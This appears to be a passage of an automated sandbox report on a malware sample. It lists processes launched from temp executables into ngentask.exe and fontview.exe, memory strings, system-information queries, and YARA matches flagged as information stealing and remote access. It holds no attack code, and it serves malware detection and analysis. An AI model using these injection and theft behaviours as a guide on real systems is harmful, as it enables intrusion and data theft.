Source: C:\Users\user\AppData\Local\Temp\43D0.exe Process created: C:\Users\user\AppData\Local\Temp\43D0.exe C:\Users\user\AppData\Local\Temp\43D0.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C4AA.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C4AA.exe Process created: C:\Windows\SysWOW64\fontview.exe C:\Windows\SYSWOW64\fontview.exe Jump to behavior
Source: explorer.exe, 00000003.00000000.375412893.0000000000E50000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: EProgram Managerzx
Source: fontview.exe, 0000000D.00000003.543911919.00000000064F0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.541667280.0000000005177000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ShellFileViewFolderExploreFolderConfirmCabinetIDDeleteGroupDeleteItemReplaceItemReloadFindFolderOpenFindFileCreateGroupShowGroupAddItemExitProgman[RN
Source: fontview.exe, 0000000D.00000003.543911919.00000000064F0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.541667280.0000000005177000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %c:\%sExplorerDMGFrameGroupssetupPmFrameGetIconGetDescriptionGetWorkingDirSoftware\Microsoft\Windows\CurrentVersion\Explorer\MapGroupsSenderCA_DDECLASSInstallMake Program Manager GroupStartUpccInsDDEBWWFrameDDEClientWndClassBACKSCAPEMediaRecorderMedia Recorder#32770DDEClientddeClassgroups
Source: fontview.exe, 0000000D.00000003.529256728.0000000004C40000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000003.00000000.387586822.000000000834F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.449577540.000000000834F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.375412893.0000000000E50000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: fontview.exe, 0000000D.00000003.528194183.0000000005170000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.527333609.0000000004C49000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: GetProgmanWindow
Source: explorer.exe, 00000003.00000000.375412893.0000000000E50000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: fontview.exe, 0000000D.00000003.543911919.00000000064F0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.541667280.0000000005177000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PreviewMetadataLabelPreviewMetadataSpacerPreviewEditMetadataPreviewMetadataControlIconLayoutsWorkAreaChangeActivityPreviewMetadataRowAddRemoveAppBarShell_TrayWndhomepagetasklinktasklinkTaskSearchTexttasks%s
Source: explorer.exe, 00000003.00000000.375241968.00000000009C8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Progmanath
Source: fontview.exe, 0000000D.00000003.529256728.0000000004C40000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: *Program ManagerpszDesktopTitleWSoftware\Classes\
Source: fontview.exe, 0000000D.00000003.543911919.00000000064F0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.541667280.0000000005177000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: animationTileContentsSrcVerticalScrollBaranimationProgressSrcanimationTileContentsDstInneranimationTileContentsSrcInneranimationTileContentsDstanimationProgressDstInneranimationProgressDstanimationProgressSrcInnereltRegularTileHeadereltSummaryeltInterruptPaneeltProgressBaridOperationTileeltInterruptDoForAlleltItemIconeltInterruptDescriptioneltInterruptButtonsContainereltInterruptDeleteBtneltInterruptElevateBtneltItemPropseltItemNameeltInterruptYesBtneltInterruptRetryBtneltInterruptCancelBtneltInterruptSkipBtnConfirmationCheckBoxDoForAlleltInterruptNoBtneltInterruptOKBtnshell\shell32\operationstatusmgr.cppidTileSubTextidOperationInterrupteltInterruptDoForAllLabelidTileActionIdTileKeepSourceidItemTileIdTileDecideForEachIdTileIgnoreIdTileKeepAsPersonalIdTileKeepAsWorkIdTileKeepDestCustomCommandIconDecideForEachTileIconSkipTileIconKeepSourceTileIconeltItemTileContainereltConflictInterruptDescriptionidTileIconidCustomConflictInterrupteltInterruptTileHeaderidConflictInterrupteltRateChartCHARTVIEW%0.2fIdTileDefaulteltPauseButtoneltTileContentseltTile%ueltTimeRemainingeltConflictInterrupteltConfirmationInterrupteltLocationseltItemsRemainingeltDetailseltScrolleltRegularTileeltCancelButtonidTileHosteltScrollBarFillereltDividereltProgressBarContainereltDisplayModeBtnFocusHoldereltDisplayModeBtnWindows.SystemToast.ExplorerEnthusiastModeprogmaneltFooterArealfEscapementSoftware\Microsoft\NotepadRICHEDIT50WlfUnderlinelfItaliclfWeightlfOrientationlfClipPrecisionlfOutPrecisionlfCharSetlfStrikeOutLucida ConsoleiPointSizelfPitchAndFamilylfQualitylfFaceName
Source: fontview.exe, 0000000D.00000003.537869173.0000000004CD0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.535582414.0000000004C45000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Shell_TrayWndSHCore.Subclass.DataSystem\CurrentControlSet\Control\HvsiWindowOverrideScaleFactorSoftware\Microsoft\Windows\CurrentVersion\Explorer\FCM\Impolite[
Source: fontview.exe, 0000000D.00000003.541667280.0000000005177000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ImageList_CoCreateInstanceProgmanProgram Managercomctl32.dllImageList_ReplaceIconImageList_CreateImageList_Destroy
Source: fontview.exe, 0000000D.00000003.543911919.00000000064F0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.541667280.0000000005177000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: |}TFoldersAppPropertiesShell*ProgmanProgmanPROGMANSoftware\Microsoft\Windows\CurrentVersion\PoliciesPolicyAutoColorizationHandleAssociationChange
Source: explorer.exe, 00000003.00000000.375412893.0000000000E50000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: fontview.exe, 0000000D.00000003.528194183.0000000005170000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.527333609.0000000004C49000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SetProgmanWindow
Source: fontview.exe, 0000000D.00000003.529256728.0000000004C40000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: RtlDllShutdownInProgress_p0.*System*.*....../UseSystemForSystemFoldersSoftware\Microsoft\Windows\CurrentVersion\Explorerdesktop.ini%APPDATA%%USERPROFILE%%ALLUSERSPROFILE%%ProgramFiles%%SystemRoot%%SystemDrive%\\%COMPUTERNAME%...\...PATH.exe.lnk.cmd.bat.com.pifCutListSoftware\Microsoft\Windows\CurrentVersion\Explorer\FileAssociation\VarFileInfo\Translation\StringFileInfo\%04X%04X\FileDescription\StringFileInfo\040904E4\FileDescription\StringFileInfo\04090000\FileDescriptionProgram ManagerpszDesktopTitleW%%%s%%%sUSERPROFILEProgramFilesSystemRootSystemDrivewindir"%1"commandshellSoftware\classesDefaultIconshell\%sAssignmentType0Software\Classes\Applications\%sSoftware\Classes\Applications%1.ade.adp.app.asp.cer.chm.cnt.crt.csh.der.fxp.gadget.grp.hlp.hpj.inf.ins.isp.its.js.jse.ksh.mad.maf.mag.mam.maq.mar.mas.mat.mau.mav.maw.mcf.mda.mdb.mde.mdt.mdw.mdz.msc.msh.msh1.msh1xml.msh2.msh2xml.mshxml.msp.mst.msu.ops.pcd.pl.plg.prf.prg.printerexport.ps1.ps1xml.ps2.ps2xml.psc1.psc2.psd1.psm1.pst.scf.sct.shb.shs.theme.tmp.url.vbe.vbp.vbs.vhd.vhdx.vsmacros.vsw.webpnp.ws.wsc.wsf.wsh.xnkHKCU:HKLM:HKCR:%s\shell\%s\commandshell\%s\commandSoftware\Clients\%sSoftware\Clients\%s\%sOpen*.*....../UseSystemForSystemFoldersdesktop.ini%SystemDrive%\\%COMPUTERNAME%...\...%s\%s\StringFileInfo\04090000\FileDescriptionT
Source: C:\Users\user\AppData\Local\Temp\C676.exe Code function: GetACP,IsValidCodePage,GetLocaleInfoW, 6_2_0042B0E9
Source: C:\Users\user\AppData\Local\Temp\C676.exe Code function: EnumSystemLocalesW, 6_2_0042B3D6
Source: C:\Users\user\AppData\Local\Temp\C676.exe Code function: EnumSystemLocalesW, 6_2_0042B38B
Source: C:\Users\user\AppData\Local\Temp\C676.exe Code function: EnumSystemLocalesW, 6_2_0042B471
Source: C:\Users\user\AppData\Local\Temp\C676.exe Code function: GetLocaleInfoW, 6_2_00423431
Source: C:\Users\user\AppData\Local\Temp\C676.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 6_2_0042B4FC
Source: C:\Users\user\AppData\Local\Temp\C676.exe Code function: GetLocaleInfoW, 6_2_0042B74F
Source: C:\Users\user\AppData\Local\Temp\C676.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 6_2_0042B878
Source: C:\Users\user\AppData\Local\Temp\C676.exe Code function: GetLocaleInfoW, 6_2_0042B97E
Source: C:\Users\user\AppData\Local\Temp\C676.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 6_2_0042BA4D
Source: C:\Users\user\AppData\Local\Temp\C676.exe Code function: EnumSystemLocalesW, 6_2_00422F0B
Source: C:\Users\user\AppData\Roaming\beirutt Code function: GetLocaleInfoA, 7_2_0040BB6C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C676.exe Code function: 6_2_00413A75 cpuid 6_2_00413A75
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C676.exe Code function: 6_2_00413CC0 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 6_2_00413CC0
Source: C:\Users\user\AppData\Local\Temp\C676.exe Code function: 6_2_004041D0 SHGetFolderPathA,GetModuleFileNameA,GetComputerNameA,GetUserNameA, 6_2_004041D0

Stealing of Sensitive Information

Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 9.3.C4AA.exe.df30000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.3.C4AA.exe.df30000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.C4AA.exe.12a0ed0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.3.C4AA.exe.df30000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.ngentask.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.C4AA.exe.12a0ed0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000002.572420134.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.485078968.000000000DF30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.490022034.000000000DF32000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.573780441.000000000128B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.581410374.00000000033E6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ngentask.exe PID: 4292, type: MEMORYSTR
Source: Yara match File source: 00000000.00000002.397037744.00000000005F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.397025095.00000000005D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.510365391.0000000003056000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.573423971.0000000004AD0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 9.3.C4AA.exe.df30000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.3.C4AA.exe.df30000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.C4AA.exe.12a0ed0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.3.C4AA.exe.df30000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.ngentask.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.C4AA.exe.12a0ed0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000002.572420134.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.485078968.000000000DF30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.490022034.000000000DF32000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.573780441.000000000128B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.581410374.00000000033E6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ngentask.exe PID: 4292, type: MEMORYSTR
Source: Yara match File source: 00000000.00000002.397037744.00000000005F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.397025095.00000000005D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.510365391.0000000003056000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.573423971.0000000004AD0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY